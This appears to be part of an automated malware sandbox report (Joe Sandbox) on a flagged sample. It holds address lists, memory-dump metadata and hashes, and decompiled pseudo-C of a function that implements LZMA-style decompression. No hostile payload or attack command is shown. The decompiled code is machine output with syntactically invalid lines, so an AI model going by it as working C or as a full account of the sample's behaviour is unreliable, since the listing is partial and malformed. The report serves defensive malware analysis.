                                                                                              0x00406fae
                                                                                              0x00406fb1
                                                                                              0x00406fb4
                                                                                              0x00406fb7
                                                                                              0x00406fba
                                                                                              0x00406fbd
                                                                                              0x00406fc0
                                                                                              0x00406fd8
                                                                                              0x00406fdb
                                                                                              0x00406fde
                                                                                              0x00406fe1
                                                                                              0x00406fe1
                                                                                              0x00406fe4
                                                                                              0x00406fe8
                                                                                              0x00406fea
                                                                                              0x00406fc2
                                                                                              0x00406fc2
                                                                                              0x00406fca
                                                                                              0x00406fcf
                                                                                              0x00406fd1
                                                                                              0x00406fd3
                                                                                              0x00406fd3
                                                                                              0x00406fed
                                                                                              0x00406ff4
                                                                                              0x00406ff7
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00406ff9
                                                                                              0x00000000
                                                                                              0x00407286
                                                                                              0x00407286
                                                                                              0x0040728a
                                                                                              0x004075b1
                                                                                              0x00000000
                                                                                              0x004075b1
                                                                                              0x00407290
                                                                                              0x00407293
                                                                                              0x00407296
                                                                                              0x0040729a
                                                                                              0x0040729d
                                                                                              0x004072a3
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a5
                                                                                              0x004072a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407395
                                                                                              0x00407399
                                                                                              0x004073bb
                                                                                              0x004073be
                                                                                              0x004073c8
                                                                                              0x00000000
                                                                                              0x004073c8
                                                                                              0x0040739b
                                                                                              0x0040739e
                                                                                              0x004073a2
                                                                                              0x004073a5
                                                                                              0x004073a5
                                                                                              0x004073a8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407452
                                                                                              0x00407456
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x00407474
                                                                                              0x0040747b
                                                                                              0x00407482
                                                                                              0x00407489
                                                                                              0x00407489
                                                                                              0x00000000
                                                                                              0x00407489
                                                                                              0x00407458
                                                                                              0x0040745b
                                                                                              0x0040745e
                                                                                              0x00407461
                                                                                              0x00407468
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073af
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407543
                                                                                              0x00407546
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040717d
                                                                                              0x0040717f
                                                                                              0x00407186
                                                                                              0x00407187
                                                                                              0x00407189
                                                                                              0x0040718c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407194
                                                                                              0x00407197
                                                                                              0x0040719a
                                                                                              0x0040719c
                                                                                              0x0040719e
                                                                                              0x0040719e
                                                                                              0x0040719f
                                                                                              0x004071a2
                                                                                              0x004071a9
                                                                                              0x004071ac
                                                                                              0x004071ba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040749f
                                                                                              0x0040749f
                                                                                              0x004074a3
                                                                                              0x004075db
                                                                                              0x00000000
                                                                                              0x004075db
                                                                                              0x004074a9
                                                                                              0x004074ac
                                                                                              0x004074af
                                                                                              0x004074b3
                                                                                              0x004074b6
                                                                                              0x004074bc
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074be
                                                                                              0x004074c1
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c4
                                                                                              0x004074c7
                                                                                              0x004074c7
                                                                                              0x004074cb
                                                                                              0x0040752b
                                                                                              0x0040752e
                                                                                              0x00407533
                                                                                              0x00407534
                                                                                              0x00407536
                                                                                              0x00407538
                                                                                              0x0040753b
                                                                                              0x00000000
                                                                                              0x0040753b
                                                                                              0x004074cd
                                                                                              0x004074d3
                                                                                              0x004074d6
                                                                                              0x004074d9
                                                                                              0x004074dc
                                                                                              0x004074df
                                                                                              0x004074e2
                                                                                              0x004074e5
                                                                                              0x004074e8
                                                                                              0x004074eb
                                                                                              0x004074ee
                                                                                              0x00407507
                                                                                              0x0040750a
                                                                                              0x0040750d
                                                                                              0x00407510
                                                                                              0x00407514
                                                                                              0x00407516
                                                                                              0x00407516
                                                                                              0x00407517
                                                                                              0x0040751a
                                                                                              0x004074f0
                                                                                              0x004074f0
                                                                                              0x004074f8
                                                                                              0x004074fd
                                                                                              0x004074ff
                                                                                              0x00407502
                                                                                              0x00407502
                                                                                              0x0040751d
                                                                                              0x00407524
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x00407526
                                                                                              0x00000000
                                                                                              0x004071c2
                                                                                              0x004071c5
                                                                                              0x004071fb
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732b
                                                                                              0x0040732e
                                                                                              0x0040732e
                                                                                              0x00407331
                                                                                              0x00407333
                                                                                              0x004075bd
                                                                                              0x00000000
                                                                                              0x004075bd
                                                                                              0x00407339
                                                                                              0x0040733c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407342
                                                                                              0x00407346
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00407349
                                                                                              0x00000000
                                                                                              0x00407349
                                                                                              0x004071c7
                                                                                              0x004071c9
                                                                                              0x004071cb
                                                                                              0x004071cd
                                                                                              0x004071d0
                                                                                              0x004071d1
                                                                                              0x004071d3
                                                                                              0x004071d5
                                                                                              0x004071d8
                                                                                              0x004071db
                                                                                              0x004071f1
                                                                                              0x004071f6
                                                                                              0x0040722e
                                                                                              0x0040722e
                                                                                              0x00407232
                                                                                              0x0040725e
                                                                                              0x00407260
                                                                                              0x00407267
                                                                                              0x0040726a
                                                                                              0x0040726d
                                                                                              0x0040726d
                                                                                              0x00407272
                                                                                              0x00407272
                                                                                              0x00407274
                                                                                              0x00407277
                                                                                              0x0040727e
                                                                                              0x00407281
                                                                                              0x004072ae
                                                                                              0x004072ae
                                                                                              0x004072b1
                                                                                              0x004072b4
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00407328
                                                                                              0x00000000
                                                                                              0x00407328
                                                                                              0x004072b6
                                                                                              0x004072bc
                                                                                              0x004072bf
                                                                                              0x004072c2
                                                                                              0x004072c5
                                                                                              0x004072c8
                                                                                              0x004072cb
                                                                                              0x004072ce
                                                                                              0x004072d1
                                                                                              0x004072d4
                                                                                              0x004072d7
                                                                                              0x004072f0
                                                                                              0x004072f2
                                                                                              0x004072f5
                                                                                              0x004072f6
                                                                                              0x004072f9
                                                                                              0x004072fb
                                                                                              0x004072fe
                                                                                              0x00407300
                                                                                              0x00407302
                                                                                              0x00407305
                                                                                              0x00407307
                                                                                              0x0040730a
                                                                                              0x0040730e
                                                                                              0x00407310
                                                                                              0x00407310
                                                                                              0x00407311
                                                                                              0x00407314
                                                                                              0x00407317
                                                                                              0x004072d9
                                                                                              0x004072d9
                                                                                              0x004072e1
                                                                                              0x004072e6
                                                                                              0x004072e8
                                                                                              0x004072eb
                                                                                              0x004072eb
                                                                                              0x0040731a
                                                                                              0x00407321
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x004072ab
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00000000
                                                                                              0x00407323
                                                                                              0x00407321
                                                                                              0x00407234
                                                                                              0x00407237
                                                                                              0x00407239
                                                                                              0x0040723c
                                                                                              0x0040723f
                                                                                              0x00407242
                                                                                              0x00407244
                                                                                              0x00407247
                                                                                              0x0040724a
                                                                                              0x0040724a
                                                                                              0x0040724d
                                                                                              0x0040724d
                                                                                              0x00407250
                                                                                              0x00407257
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x0040722b
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00000000
                                                                                              0x00407259
                                                                                              0x00407257
                                                                                              0x004071dd
                                                                                              0x004071e0
                                                                                              0x004071e2
                                                                                              0x004071e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406f44
                                                                                              0x00406f44
                                                                                              0x00406f48
                                                                                              0x0040758d
                                                                                              0x00000000
                                                                                              0x0040758d
                                                                                              0x00406f4e
                                                                                              0x00406f51
                                                                                              0x00406f54
                                                                                              0x00406f57
                                                                                              0x00406f5a
                                                                                              0x00406f5d
                                                                                              0x00406f60
                                                                                              0x00406f62
                                                                                              0x00406f65
                                                                                              0x00406f68
                                                                                              0x00406f6b
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00406f6d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                              • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                                              • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                              • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
